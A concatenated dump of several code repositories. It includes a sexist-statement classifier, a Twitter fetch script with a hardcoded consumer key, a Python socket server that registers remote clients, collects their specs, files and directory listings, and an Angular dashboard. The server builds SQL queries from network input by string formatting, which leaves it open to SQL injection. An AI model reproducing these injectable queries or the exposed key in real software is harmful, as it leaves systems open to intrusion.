EMBEDDING_DIM = int(args.dimension)
SEED = int(args.seed)
NO_OF_FOLDS = int(args.folds)
CLASS_WEIGHT = args.class_weight
LOSS_FUN = args.loss
OPTIMIZER = args.optimizer
KERNEL = args.kernel
if args.tokenizer == "glove":
TOKENIZER = glove_tokenize
elif args.tokenizer == "nltk":
TOKENIZER = tokenize_nltk.casual.TweetTokenizer(strip_handles=True, reduce_len=True).tokenize
INITIALIZE_WEIGHTS_WITH = args.initialize_weights
LEARN_EMBEDDINGS = args.learn_embeddings
EPOCHS = int(args.epochs)
BATCH_SIZE = int(args.batch_size)
SCALE_LOSS_FUN = args.scale_loss_function
np.random.seed(SEED)
print('GLOVE embedding: ' + str(GLOVE_MODEL_FILE))
print('Embedding Dimension: ' + str(int(EMBEDDING_DIM)))
print('Allowing embedding learning: ' + str(LEARN_EMBEDDINGS))
word_to_index, index_to_word, word_to_vec_map = read_glove_vecs('data/glove.6B.50d2.txt')
word2vec_model = word_to_vec_map.copy()
X_tweets, y = read_csv('data/SD_dataset_FINAL.csv')
print(np.array(list(word_to_vec_map.keys())).shape)  # list() needed in Python 3, where keys() is a view
# gen_vocab(X_tweets)
vocab = word_to_index.copy()
reverse_vocab = index_to_word.copy()
vocab['UNK'] = len(vocab) + 1
print(len(vocab))
reverse_vocab[len(vocab)] = 'UNK'
X, y = gen_sequence(X_tweets, y)
MAX_SEQUENCE_LENGTH = max(map(lambda x: len(x), X))
print("max seq length is " + str(MAX_SEQUENCE_LENGTH))
data = pad_sequences(X, maxlen=MAX_SEQUENCE_LENGTH)
y = np.array(y)
data, y = shuffle(data, y)
W = get_embedding_weights()
# print(data.shape[1])
model = lstm_model((data.shape[1],), EMBEDDING_DIM)
# model = lstm_model(data.shape[1], 25, get_embedding_weights())
# y_oh = convert_to_one_hot(y, C=2)
# print(data)
# print(y)
# print(data.shape)
# print(y.shape)
train_LSTM(data, y, model, EMBEDDING_DIM, W)
X_train, X_test, y_train, y_test = train_test_split(data, y, test_size=0.2, random_state=np.random)
# maxLen = MAX_SEQUENCE_LENGTH
# print(X_train)
# print(X_train.shape)
# X_train_indices = sentences_to_indices(X_train, word_to_index, maxLen)
y_train_oh = convert_to_one_hot(y_train, C=2)
# print(np.array(X_train).shape)
# print(y_train_oh.shape)
# model.fit(X_train, y_train_oh, epochs=EPOCHS, batch_size=BATCH_SIZE, shuffle=True)
y_test_oh = convert_to_one_hot(y_test, C=2)
loss, acc = model.evaluate(X_test, y_test_oh)
pred = model.predict(X_test)
table = model.layers[1].get_weights()[0]
print(acc)
print(table)
print(np.array(table).shape)
np.save('lstm_embed.npy', np.array(table))
with open('vocab_text', 'w') as f_vocab:
json.dump(vocab, f_vocab)  # json.dump takes (obj, file_handle), not (file_handle, filename)
pdb.set_trace()
<file_sep>/twitterBESexistExtract.py
import collections
import math
import sys
import twitter
import pandas as pd
import numpy as np
import time
c_k = 'oPbv9rsGgmsh3E0vfN4apXJC5'
c_sk = '<KEY>'
a_t_k = '<KEY>'
a_t_sk = '<KEY>'
raw_data_loc = 'hostile_sexist.tsv'
api = twitter.Api(consumer_key=c_k,
consumer_secret=c_sk,
access_token_key=a_t_k,
access_token_secret=a_t_sk,
sleep_on_rate_limit=True)
tID_raw = pd.read_csv(raw_data_loc, sep='\t')
tID_raw['label'] = '0'
N, C = tID_raw.shape
tID_text = tID_raw.values
print(C)
print(tID_text)
tID_text_toReplace = tID_text.copy()
i = 0
for id, label in tID_text:
if label != 'racism' and label != 1:
print(id)
id = int(id)
tweet = ''
try:
tweet = api.GetStatus(id).text
except twitter.error.TwitterError as e:
print(str(e))
tweet = 'error in fetching'
tID_text_toReplace[i, 0] = tweet
tID_text_toReplace[i, 1] = 1
pd.DataFrame(tID_text_toReplace).to_csv('HS_dataset_withText.csv')
elif label != 0 and label != 1:  # "or" here made the condition always true
tID_text_toReplace[i, 1] = 'NA'  # this array has two columns; index 2 was out of range
i += 1
# time.sleep(0.5)
print(i)
print("Test status: " + str(api.GetStatus('572342978255048705').text))<file_sep>/nn_classifier.py
from data_handler import get_data
import sys
import pandas as pd
import numpy as np
from keras.preprocessing.sequence import pad_sequences
import pdb, json
from sklearn.metrics import make_scorer, f1_score, accuracy_score, recall_score, precision_score, classification_report, precision_recall_fscore_support
from sklearn.ensemble import GradientBoostingClassifier, RandomForestClassifier
from sklearn.model_selection import cross_val_score, cross_val_predict
from sklearn.feature_extraction.text import TfidfVectorizer
import pdb
from sklearn.metrics import make_scorer, f1_score, accuracy_score, recall_score, precision_score, classification_report, precision_recall_fscore_support
from sklearn.ensemble import GradientBoostingClassifier, RandomForestClassifier
from sklearn.svm import SVC, LinearSVC
from sklearn.model_selection import KFold
from sklearn.linear_model import LogisticRegression
from sklearn.utils import shuffle
import codecs
import operator
import sklearn
from collections import defaultdict
from batch_gen import batch_gen
from my_tokenizer import glove_tokenize
import xgboost as xgb
# logistic, gradient_boosting, random_forest, svm, tfidf_svm_linear, tfidf_svm_rbf
model_count = 2
word_embed_size = 200
GLOVE_MODEL_FILE = str(sys.argv[1])
EMBEDDING_DIM = int(sys.argv[2])
MODEL_TYPE = sys.argv[3]
print('Embedding Dimension: %d' % EMBEDDING_DIM)
print('GloVe Embedding: %s' % GLOVE_MODEL_FILE)
word2vec_model1 = np.load('lstm_embed.npy')
print(word2vec_model1.shape)
word2vec_model1 = word2vec_model1.reshape((word2vec_model1.shape[0], word2vec_model1.shape[1]))
f_vocab = open('vocab_text', 'r')
vocab = json.load(f_vocab)
word2vec_model = {}
for k, v in vocab.items():  # dict.iteritems() is Python 2 only
word2vec_model[k] = word2vec_model1[int(v)]
del word2vec_model1
SEED = 42
MAX_NB_WORDS = None
VALIDATION_SPLIT = 0.2
# vocab generation
vocab, reverse_vocab = {}, {}
freq = defaultdict(int)
tweets = {}
def select_tweets_whose_embedding_exists():
# selects the tweets as in mean_glove_embedding method
# Processing
# pd.read_csv returns a DataFrame; take the text column explicitly
X = pd.read_csv('data/SD_dataset_FINAL.csv', header=None).iloc[:, 0].values
return X
def gen_data():
# pd.read_csv returns a DataFrame; split it into text and label columns
df = pd.read_csv('data/SD_dataset_FINAL.csv', header=None)
X, y = df.iloc[:, 0].values, df.iloc[:, -1].values
X_e = []
for s in X:
words = glove_tokenize(s)
emb = np.zeros(word_embed_size)
for word in words:
try:
emb += word2vec_model[word]
except:
pass
emb /= len(words)
X_e.append(emb)
return X_e, y
def get_model(m_type=None):
if not m_type:
print('ERROR: Please provide a valid method name')
return None
if m_type == 'logistic':
logreg = LogisticRegression()
elif m_type == "gradient_boosting":
#logreg = GradientBoostingClassifier(n_estimators=10)
logreg = xgb.XGBClassifier(nthread=-1)
elif m_type == "random_forest":
logreg = RandomForestClassifier(n_estimators=100, n_jobs=-1)
elif m_type == "svm_rbf":
logreg = SVC(class_weight="balanced", kernel='rbf')
elif m_type == "svm_linear":
logreg = LinearSVC(class_weight="balanced")
else:
print("ERROR: Please specify a correst model")
return None
return logreg
def classification_model(X, Y, model_type="logistic"):
NO_OF_FOLDS=10
MAX_SEQUENCE_LENGTH = max(map(lambda x: len(x), X))
X = pad_sequences(X, maxlen=MAX_SEQUENCE_LENGTH)
y = np.array(Y)
X, y = shuffle(X, y)
print("Model Type: " + str(model_type))
#predictions = cross_val_predict(logreg, X, Y, cv=NO_OF_FOLDS)
scores1 = cross_val_score(get_model(model_type), X, Y, cv=NO_OF_FOLDS, scoring='precision_weighted')
print("Precision(avg): %0.3f (+/- %0.3f)" % (scores1.mean(), scores1.std() * 2))
scores2 = cross_val_score(get_model(model_type), X, Y, cv=NO_OF_FOLDS, scoring='recall_weighted')
print("Recall(avg): %0.3f (+/- %0.3f)" % (scores2.mean(), scores2.std() * 2))
scores3 = cross_val_score(get_model(model_type), X, Y, cv=NO_OF_FOLDS, scoring='f1_weighted')
print("F1-score(avg): %0.3f (+/- %0.3f)" % (scores3.mean(), scores3.std() * 2))
pdb.set_trace()
if __name__ == "__main__":
X, Y = pd.read_csv('data/SD_dataset_FINAL.csv')
classification_model(X, Y, MODEL_TYPE)
pdb.set_trace()
|
3f7bf363e65aca3394004517d18103ed72cb47eb
|
[
"Markdown",
"Python",
"Text"
] | 9 |
Python
|
JaquJaqu/Automatic_Detection_of_Sexist_Statements_Commonly_Used_at_the_Workplace
|
96e2db32557f6b33bce7981674530477f0381854
|
15308ff063e4b5233219dd987b54b45774f7f18a
|
refs/heads/master
|
<file_sep>const gridLayer = document.querySelector('#container');
let grid = [];
function clearGrid(){
let gridLength = grid.length;
for (let i=0; i< gridLength; i++){
grid[i].classList.remove('gridHovered');
}
}
// Delete grid function
function deleteGrid(){
    while (gridLayer.firstChild) {
        gridLayer.removeChild(gridLayer.firstChild);
    }
    grid.length = 0;
}
function askPlayer(){
let playerSquare;
deleteGrid();
    do {
        playerSquare = Number(prompt("How many squares per side would you like to have? "));
    }
    while (!playerSquare || playerSquare > 64);
    gridArray(playerSquare);
}
function gridArray(gridsize){
let gridSizeLength = Number(gridsize),
gridTotal = gridSizeLength * gridSizeLength,
gridWidthCalc = 0;
gridWidthCalc = ( 100 / gridSizeLength );
document.documentElement.style.setProperty(`--grid-width`, gridWidthCalc + "%");
for ( let i=0; i < gridTotal ; i++ )
{
grid[i] = document.createElement('div');
grid[i].classList.add('gridDiv');
gridLayer.appendChild(grid[i]);
grid[i].addEventListener('mouseover', function (){
grid[i].classList.add('gridHovered');
});
};
console.log(grid);
}
gridArray(16);
|
d62f39a1f2733efe89c125d2945efbc6fa119353
|
[
"JavaScript"
] | 1 |
JavaScript
|
touchnit/OdinEtchASketch
|
3f2b9d29c418ab76a85a327444995e59dda99ca5
|
43ee2b4f0c73eeb32241b649d69fdfde046ae74d
|
refs/heads/master
|
<repo_name>nikrosss/client-server<file_sep>/CuiCat2.py
import socket
import base64
import threading
def dir():
    print("sending the requested directory")
    Prosmotr_cat_why1 = b"" + str.encode(Prosmotr_cat_why)
    print(Prosmotr_cat_why1)
    conn.send(Prosmotr_cat_why1)
    print("started receiving the directory listing file")
    fil = open('catalog.txt', 'wb')
    data1 = conn.recv(1024)
    # data1 = data1.decode()
    print("received the contents:")
    fil.write(data1)
    fil.close()
    print("Saved the directory contents")
    Prosmotr_cat_open = open('Prosmotr_cat.txt', 'w')
    Prosmotr_cat_open.write("False\n" + Prosmotr_cat_why)
while True:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("",14903))
sock.listen(10)
conn, addr = sock.accept()
print(addr[0])
data = conn.recv(1024)
print (data)
udata = base64.b64decode(data)
udata = udata.decode("utf-8")
print ("Data: " + udata)
    if udata == "ping":
        print("we were asked about directories")
        Prosmotr_cat_open = open('Prosmotr_cat.txt', 'r')
        Prosmotr_cat_a = [a.strip() for a in Prosmotr_cat_open.readlines()] # strip end-of-line characters
        if len(Prosmotr_cat_a)>=2:
            Prosmotr_cat = Prosmotr_cat_a[0] # extract the flag from the list of lines
            Prosmotr_cat_why = Prosmotr_cat_a[1]
Prosmotr_cat_open.close()
if Prosmotr_cat == "True":
if len(Prosmotr_cat_why) != 0:
print (Prosmotr_cat)
print (Prosmotr_cat_why)
yas=str.encode("yas")
yas=base64.b64encode(yas)
conn.send(yas)
threading.Thread(target=dir).start()
else:
no=str.encode("no")
no=base64.b64encode(no)
conn.send(no)
if Prosmotr_cat == "False":
no=str.encode("no")
no=base64.b64encode(no)
conn.send(no)
else:
no=str.encode("no")
no=base64.b64encode(no)
conn.send(no)
# comment<file_sep>/GuiServer.py
from tkinter import *
from tkinter import ttk
import tkinter.messagebox
import time
#import socket
import os
import sqlite3
import threading
# Create the application window
class Application(Frame):
def __init__(self, master):
super(Application, self).__init__(master)
self.grid()
self.place()
self.create_w()
    # Create and lay out the window widgets
    def create_w(self):
        # Menu
        menu = Menu(self.master)
        self.master.config(menu=menu)
        file = Menu(menu)
        file.add_command(label='Open', )
        file.add_command(label='Close', )
        menu.add_cascade(label = 'File', menu = file)
        modul = Menu(menu)
        modul.add_command(label='File manager',)
        modul.add_command(label='All clients',)
        menu.add_cascade(label = 'Modules', menu = modul)
        # Labels
        self.lb1=Label(self, text="Clients with status ")
        self.lb1.grid(row=0, column=0, columnspan=1, sticky=W)
        self.lb2=Label(self, text="online")
        self.lb2.grid(row=0, column=1, columnspan=1, sticky=W)
        # self.lb3=Label(self, text='client1')
        # self.lb3.grid(row=1, column=0, columnspan=1, sticky=W)
        # self.lb4=Label(self, text='status1')
        # self.lb4.grid(row=1, column=1, columnspan=1, sticky=W)
        # self.lb5=Label(self, text=' ffff')
        # self.lb5.grid(row=3, column=0, columnspan=7, sticky=W)
        # Buttons
        self.bt1 = Button(self, bd=2, text = "Client details", command=self.info)
        self.bt1.grid(row=2, column =2)
        self.bt2 = Button(self, bd=2, text = "Start the file module", command=self.link_open)
        self.bt2.grid(row=2, column =0)
        self.bt2 = Button(self, bd=2, text = "Deny connection", command=self.link_close)
        self.bt2.grid(row=2, column =4)
        # self.bt3 = Button(self, bd=2, text = "Check status", command=self.status)
        # self.bt3.grid(row=1, column =3)
        # Listbox
        self.listbox1=Listbox(self, height = 20, width =35, bd=3, selectmode=SINGLE)
threading.Thread(target=self.Online).start()
self.listbox1.grid(row=1, column=0, columnspan = 2)
def info (self):
if len(self.listbox1.curselection()) != 0:
select = self.listbox1.get(self.listbox1.curselection())
print(select)
select_a = select[0]
print(select_a)
select_b = open((os.path.join(os.getcwd(),str(select_a), 'iron.txt')), 'r')
a = select_b.readlines()
            tkinter.messagebox.showinfo('Client specifications', a)
select_b.close()
# der = open('save_inf_client.txt', 'r')
# a = der.readlines()
# self.lb5["text"] = str(a)
# print (a)
# der.close()
def link_open (self):
conn_sql = sqlite3.connect("test.sqlite3")
curs = conn_sql.cursor()
if len(self.listbox1.curselection()) != 0:
select = self.listbox1.get(self.listbox1.curselection())
print(select)
select_a = select[0]
            curs.execute("update Configs set catl ='True' where PersonID =" + str(select_a))
            conn_sql.commit()
            print("The file manager can now be started")
            curs.close()
            conn_sql.close()
        else:
            print("Nothing is selected")
def link_close (self):
file = open("count_s.txt", 'w')
file.write('1')
file.close()
def status(self):
status_clienta=open('status.txt', 'r')
b1=[a.strip() for a in status_clienta.readlines()]
b=b1[0]
b2=b.split(' ')
if b2[0] == "ping":
self.lb4["text"] = "on line"
else :
self.lb4["text"] = "off line"
b=b1[0]
b2=b.split(' ')
client1 = b2[1]
status_clienta.close()
status_clienta_del=open('status.txt', 'w')
status_clienta_del.write(client1)
status_clienta_del.close()
def Online(self):
conn_sql1 = sqlite3.connect("test.sqlite3")
curs1 = conn_sql1.cursor()
self.listbox1.delete
status = 0
while status ==0:
self.listbox1.delete(0, END)
for der in curs1.execute("SELECT PersonID, NetvorcName, ipAdres, MetaName from Persons where status = 'online'"):
self.listbox1.insert(END, der)
print(der)
time.sleep(30)
curs1.close()
conn_sql1.close()
root = Tk()
root.title("Server 0.7")
root.geometry("700x600")
app = Application(root)
vb=0
root.mainloop()<file_sep>/server3.py
import time
import socket
import threading
import sqlite3
import os
import base64
#file = open('count_s.txt', 'r')
#count_a = [a.strip() for a in file.readlines()] # strip end-of-line characters
#count = count_a[0] # extract the value from the list of lines
#file.close()
#print (count)
print("The server is up")
# Function that receives images. Opens port 14901.
# The same function also receives all other files.
def pic ():
    print("started receiving a file")
pic_con = socket.socket()
pic_con.bind(("",14901))
pic_con.listen(2)
conn1, addr1 = pic_con.accept()
conn_sql1 = sqlite3.connect("test.sqlite3")
curs1 = conn_sql1.cursor()
ip_adr1=addr1[0]
curs1.execute("SELECT PersonID from Persons where IpAdres ='%s'" % ip_adr1)
c1=curs1.fetchone()
print(c1)
print(os.path.join(os.getcwd(),str(c1[0]),str(udata1)))
pich = open((os.path.join(os.getcwd(),str(c1[0]),str(udata1))), 'wb')
while 1:
data1 = conn1.recv(1024)
data1=base64.b64decode(data1)
print(data1)
pich.write(data1)
if not data1 :
break
pich.close()
conn1.close()
curs1.close()
conn_sql1.close()
def dir():
    print("sending the requested directory")
    Prosmotr_cat_why1 = b"" + str.encode(Prosmotr_cat_why)
    print(Prosmotr_cat_why1)
    conn.send(Prosmotr_cat_why1)
    print("started receiving the directory listing file")
    fil = open('catalog.txt', 'wb')
    data1 = conn.recv(1024)
    # data1 = data1.decode()
    print("received the contents:")
    fil.write(data1)
    fil.close()
    print("Saved the directory contents")
    Prosmotr_cat_open = open('Prosmotr_cat.txt', 'w')
    Prosmotr_cat_open.write("False\n" + Prosmotr_cat_why)
# Main program loop. Opens port 14900 and reads data from it, then decodes it as UTF-8
start = True
while start == True:
    print("Waiting for incoming data")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("",14900))
sock.listen(10)
conn, addr = sock.accept()
print(addr[0])
data = conn.recv(1024)
print (data)
udata = data.decode("utf-8")
print ("Data: " + udata)
name_pic = udata.split(".")
name_pic2 = len(name_pic)
    print ("List length: ", name_pic2, )
    # New client ID generation
if udata[0:7] == "null_id":
conn_sql = sqlite3.connect("test.sqlite3")
curs = conn_sql.cursor()
        # Before generating a new ID, check for an existing ID by IP
        ip_adr=addr[0]
        curs.execute("SELECT PersonID from Persons where IpAdres ='%s'" % ip_adr)
        c=curs.fetchone()
        print(c)
        # If the IP was not found, create a new client
        # ELSE, send the existing ID
if c ==None:
curs.execute('select * from Count_clientt')
count_cl = curs.fetchone()
            print("New client ID: " + str(count_cl[0]))
            new_count_cl = count_cl[0]+1
            new_count_cl_str=str(new_count_cl)
            print("Raising the counter to: "+ str(new_count_cl))
            # Update the client counter
            curs.execute('update Count_clientt set count =' + str(new_count_cl))
            os.mkdir(str(count_cl[0]),)
            print("Created the client directory: "+ str(count_cl[0]))
sysdate=time.asctime()
            # Write the client data and new configs to the DB
insert_sql=[(str(count_cl[0]), 'null' ,addr[0], str(sysdate), 'не задано', 'online')]
curs.executemany('insert INTO Persons values (?, ?, ?, ?,? ,?)', insert_sql)
conf = [(str(count_cl[0]), 'False' , 'False')]
curs.executemany('insert INTO Configs values (?, ?,?)', conf)
conn_sql.commit()
            print("committed")
            curs.close()
            conn_sql.close()
            id=str.encode(str(count_cl[0]))
            conn.send(id)
            print("sent the id to the client")
        else:
            print("Sending the ID found in the DB")
id=str.encode(str(c[0]))
sysdate=time.asctime()
curs.execute("update Persons set OnlineDate ='%s'" % str(sysdate) +"where PersonID ='%s'" % c[0])
conn_sql.commit()
conn_sql.close()
conn.send(id)
    # Because of problems transferring Russian text, receiving the specs is implemented as a file transfer.
if int(name_pic2) ==2 and name_pic[0]=="iron":
name_pic1 = name_pic[0]+"."+name_pic[1]
udata1=udata
threading.Thread(target=pic).start()
# data_pic = pic()
    if int(name_pic2)==2 and name_pic[0]=="my_id":
        print("Client came online, updating data: ip")
        conn_sql = sqlite3.connect("test.sqlite3")
        curs = conn_sql.cursor()
        ip_adr=addr[0]
        curs.execute("update Persons set IpAdres='%s'" % ip_adr +"where PersonID ='%s'" % name_pic[1])
        print("Updated the data")
conn_sql.commit()
curs.close()
conn_sql.close()
    if udata[0:5] == "param":
        print("Client requested settings")
        conn_sql = sqlite3.connect("test.sqlite3")
        curs = conn_sql.cursor()
        # look up the ID by IP
        ip_adr=addr[0]
        curs.execute("SELECT PersonID from Persons where IpAdres ='%s'" % ip_adr)
        c=curs.fetchone()
        # Using the found ID, check whether configs need to be sent
        curs.execute("SELECT UnloudConfig, catl from Configs where PersonID ='%s'" % str(c[0]))
        new_sit_a = curs.fetchone()
        # Update the online timestamp
        sysdate=time.asctime()
        curs.execute("update Persons set OnlineDate='%s'" % str(sysdate) +",status='online' where IpAdres ='%s'" % ip_adr)
        curs.close()
        conn_sql.close()
        print("New settings: "+ new_sit_a[0])
        print("File operations: "+ new_sit_a[1])
if new_sit_a[1] == 'True':
otvet = str.encode("catl")
conn.send(otvet)
            print("sent ", otvet)
            conn_sql = sqlite3.connect("test.sqlite3")
            curs = conn_sql.cursor()
            curs.execute("update Configs set catl ='False' where PersonID =" + str(c[0]))
            conn_sql.commit()
            print("Reset the config")
            curs.close()
            conn_sql.close()
        if new_sit_a[0] == 'True':
            otvet = str.encode("yas")
            conn.send(otvet)
            print("sent ", otvet)
time.sleep(1)
print (os.path.join(os.getcwd(), str(c[0]),'Param.txt'))
ReParam = open((os.path.join(os.getcwd(), str(c[0]),'Param.txt')), 'rb')
ReParam = ReParam.read(1024)
conn.send(ReParam)
conn_sql = sqlite3.connect("test.sqlite3")
curs = conn_sql.cursor()
curs.execute("update Configs set UnloudConfig ='False' where PersonID ='%s'" % str(c[0]))
conn_sql.commit()
conn_sql.close()
if new_sit_a[0] == 'False':
otvet = str.encode("False")
conn.send(otvet)
            print("sent ", otvet)
    # old method; the specs are now received as a file
    if udata[0:14] == "haracteristics":
        save=open("save_inf_client.txt", 'w')
        save.write(str(udata))
        save.close()
        print("The received data has been processed")
|
413c53231399970f2233e26d186b89df0fdc2eba
|
[
"Python"
] | 3 |
Python
|
nikrosss/client-server
|
e0df0fbb0aaab8c0920f59c2aef9385d8faaa3b8
|
67b3d1a55af7d54a6cfcc1141f77a9ed41e8cbbd
|
refs/heads/master
|
<repo_name>wumanrou/pageswitcher<file_sep>/src/com/example/dividescreen/MainActivity.java
package com.example.dividescreen;
import java.util.ArrayList;
import java.util.List;
import android.os.Bundle;
import android.app.Activity;
import android.support.v4.view.PagerAdapter;
import android.support.v4.view.PagerTabStrip;
import android.support.v4.view.ViewPager;
import android.support.v4.view.ViewPager.OnPageChangeListener;
import android.view.Menu;
import android.view.View;
import android.view.View.OnClickListener;
import android.view.ViewGroup;
import android.view.WindowManager;
import android.widget.ImageView;
import android.widget.LinearLayout;
public class MainActivity extends Activity {
    private ViewPager mViewPager;// container that holds the multiple pages
    private PagerTabStrip mTab;// page tab strip
    private LinearLayout mImgs;// linear layout holding the bottom indicator images
    private int[] layouts=new int[]{R.layout.framelayouttest,R.layout.texteditor,R.layout.textvieweffect};// layout files of the pages
    private String[] titles=new String[]{"Neon light","Text","Text effects"};
    private ImageView[] mImgViews=new ImageView[layouts.length];
    private List<View>views=new ArrayList<View>();// list holding all pages
    private List<String>pagerTitles=new ArrayList<String>();// list holding all titles
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
        getWindow().setFlags(WindowManager.LayoutParams.FLAG_FULLSCREEN, WindowManager.LayoutParams.FLAG_FULLSCREEN);// make the window full screen
        setContentView(R.layout.activity_main);
        mImgs=(LinearLayout)findViewById(R.id.mImgs);// look up the widgets by their IDs
        mViewPager=(ViewPager)findViewById(R.id.mViewPager);
        mTab=(PagerTabStrip)findViewById(R.id.mTabr);
        // Set the spacing between tabs; by default several tabs are visible on one page
        mTab.setTextSpacing(300);
        init();// run initialization
        mViewPager.setAdapter(new MyPagerAdapter());// attach the adapter to the ViewPager
        initImg();// initialize the indicator images
        // register a page-change listener on the ViewPager
        mViewPager.setOnPageChangeListener(new MyPageChangeListener());
}
    // Custom page-change listener
    private class MyPageChangeListener implements OnPageChangeListener{
public void onPageScrollStateChanged(int arg0){
}
public void onPageScrolled(int arg0,float arg1,int arg2){
}
        public void onPageSelected(int selected){// the displayed page has changed
            resetImg();// reset the bottom indicator images
            // highlight the image for the current page in red
            mImgViews[selected].setImageResource(R.drawable.choosed);
}
}
    // Custom PagerAdapter class that wraps the pages to switch between
    private class MyPagerAdapter extends PagerAdapter{
        public int getCount(){// returns the number of contained pages
return views.size();
}
public boolean isViewFromObject(View arg0,Object arg1){
return arg0==arg1;
}
        public CharSequence getPageTitle(int position){// returns the page title
return pagerTitles.get(position);
}
        // initializes the given page
        public Object instantiateItem(ViewGroup container,int position){
            ((ViewPager)container).addView(views.get(position));
            return views.get(position);
        }
        // destroys the given page
public void destroyItem(ViewGroup container,int position,Object object){
((ViewPager)container).removeView(views.get(position));
}
}
    public void init(){// initializes the pages to display and adds them to the list
for(int i=0;i<layouts.length;i++){
View view=getLayoutInflater().inflate(layouts[i], null);
views.add(view);
pagerTitles.add(titles[i]);
}
}
    public void initImg(){// initializes the bottom images and adds them to the horizontal linear layout
        for(int i=0;i<mImgViews.length;i++){
            mImgViews[i]=new ImageView(MainActivity.this);
            if(i==0){// the first image is selected by default
mImgViews[i].setImageResource(R.drawable.choosed);
}else{
mImgViews[i].setImageResource(R.drawable.unchoosed);
}
mImgViews[i].setPadding(20, 0, 0, 0);
mImgViews[i].setId(i);
mImgViews[i].setOnClickListener(mOnClickListener);
mImgs.addView(mImgViews[i]);
}
}
    // Anonymous click handler for the bottom images.
    // It switches the highlight: the clicked image turns red, the others yellow.
    private OnClickListener mOnClickListener=new OnClickListener(){
        public void onClick(View v){
            resetImg();// reset the highlight, setting every image to yellow
            // set the clicked image to red
            ((ImageView)v).setImageResource(R.drawable.choosed);
            // switch to the page matching the clicked image
            mViewPager.setCurrentItem(v.getId());
}
};
    public void resetImg(){// sets every ImageView back to the unselected image
for(int i=0;i<mImgViews.length;i++){
mImgViews[i].setImageResource(R.drawable.unchoosed);
}
}
}
|
8b9ec16c1b4d10a62aa2e04c909f6c42abca49ba
|
[
"Java"
] | 1 |
Java
|
wumanrou/pageswitcher
|
09f84dd8401176dceebed9d43b16ba4f7ee82f37
|
cb2c515110d53a1b070a7ee70178c053189cb301
|
refs/heads/main
|
<file_sep>import { Component, OnInit } from '@angular/core';
import { DetailsService } from '../details.service';
@Component({
selector: 'app-first-component',
templateUrl: './first-component.component.html',
styleUrls: ['./first-component.component.css']
})
export class FirstComponentComponent implements OnInit {
constructor(public _emp: DetailsService,) {}
Object = Object;
ngOnInit() {}
goToFirstPage = () => {
this._emp.firstStep = true;
this._emp.isNewDetails = false;
}
}
<file_sep>import { BrowserModule } from '@angular/platform-browser';
import { NgModule } from '@angular/core';
import { FormsModule } from "@angular/forms";
import { AppComponent } from './app.component';
import { FirstComponentComponent } from './first-component/first-component.component';
import { AppRoutingModule } from './app-routing.module';
import { ChartsModule, ThemeService } from 'ng2-charts';
import {MatCardModule} from '@angular/material/card';
import { FlexLayoutModule } from '@angular/flex-layout';
import {MatListModule} from '@angular/material/list';
import {MatDividerModule} from '@angular/material/divider';
import { AngularFontAwesomeModule } from 'angular-font-awesome';
import { BrowserAnimationsModule } from '@angular/platform-browser/animations'
import {MatIconModule} from '@angular/material/icon';
import { DetailsService } from './details.service';
import {MatButtonModule} from '@angular/material/button';
import {MatToolbarModule} from '@angular/material/toolbar';
import {MatBadgeModule} from '@angular/material/badge';
import {MatGridListModule} from '@angular/material/grid-list';
@NgModule({
declarations: [
AppComponent,
FirstComponentComponent
],
imports: [
FormsModule,
BrowserModule,
MatCardModule,
AppRoutingModule,
FlexLayoutModule,
MatDividerModule,
MatIconModule,
MatListModule,
ChartsModule,
BrowserAnimationsModule,
AngularFontAwesomeModule,
MatButtonModule,
MatToolbarModule,
MatBadgeModule,
MatGridListModule
],
providers: [ThemeService,DetailsService],
bootstrap: [AppComponent]
})
export class AppModule { }
<file_sep>import { Injectable } from '@angular/core';
import { of } from 'rxjs';
@Injectable({
providedIn: 'root'
})
export class DetailsService {
constructor() { }
userId = null;
isNewDetails = false;
firstStep = true;
myImage : string = "https://i.ibb.co/26chhvk/map.jpg";
proImage : string = "https://i.ibb.co/kXpGFyf/profile.jpg";
letterImage : string = "https://i.ibb.co/HtR8WMB/angular-Icon.png";
getSales() {
return of({
"year1": {
"volumeSales": "0.09",
"valueSales": "1.23"
},
"year2": {
"volumeSales": "0.11",
"valueSales": "1.56"
},
"year3": {
"volumeSales": "0.12",
"valueSales": "1.69"
},
"year4": {
"volumeSales": "0.12",
"valueSales": "1.64"
},
"year5": {
"volumeSales": "0.10",
"valueSales": "1.41"
},
"total": {
"volumeSales": "0.55",
"valueSales": "7.53"
}
});
}
private apiURLId1 = "https://reqres.in/api/users/1";
private apiURLId2 = "https://reqres.in/api/users/2";
private apiURLId3 = "https://reqres.in/api/users/3";
private apiURLId4 = "https://reqres.in/api/users/4";
private apiURLId5 = "https://reqres.in/api/users/5";
private apiURLId6 = "https://reqres.in/api/users/6";
firstId:{};
secondId:{};
thirdId:{};
fourthId:{};
fifthId:{};
sixthId:{};
async firstRunningMethod() {
try{
let response = await fetch(this.apiURLId1);
let readAbleData = await response.json();
this.firstId = readAbleData.data;
} catch(error){console.log(error)}
}
async secondRunningMethod() {
try{
let response = await fetch(this.apiURLId2);
let readAbleData = await response.json();
this.secondId = readAbleData.data;
} catch(error){console.log(error)}
}
async thirdRunningMethod() {
try{
let response = await fetch(this.apiURLId3);
let readAbleData = await response.json();
this.thirdId = readAbleData.data;
} catch(error){console.log(error)}
}
async fourthRunningMethod() {
try{
let response = await fetch(this.apiURLId4);
let readAbleData = await response.json();
this.fourthId = readAbleData.data;
} catch(error){console.log(error)}
}
async fifthRunningMethod() {
try{
let response = await fetch(this.apiURLId5);
let readAbleData = await response.json();
this.fifthId = readAbleData.data;
} catch(error){console.log(error)}
}
async sixthRunningMethod() {
try{
let response = await fetch(this.apiURLId6);
let readAbleData = await response.json();
this.sixthId = readAbleData.data;
} catch(error){console.log(error)}
}
}
<file_sep>import { Component, OnDestroy, OnInit } from '@angular/core';
import { DetailsService } from './details.service';
import { Subscription } from 'rxjs'
@Component({
selector: 'app-root',
templateUrl: './app.component.html',
styleUrls: ['./app.component.css']
})
export class AppComponent implements OnInit, OnDestroy{
title = 'materialChartjs';
private apiURL = "https://reqres.in/api/users";
mdeiaSub:Subscription;
deviceXs:boolean;
constructor(public _emp: DetailsService) {}
public barChartOptions: any = {
scaleShowVerticalLines: false,
responsive: true
};
public barChartLabels: string[];
public barChartType: string = 'bar';
public barChartLegend: boolean = true;
public barChartData: any[] = [
{ data: [], label: 'Volume Sales' },
{ data: [], label: 'Value Sales' }
];
tiles = [
{text: 'One', cols: 1, rows: 1, color: 'white',},
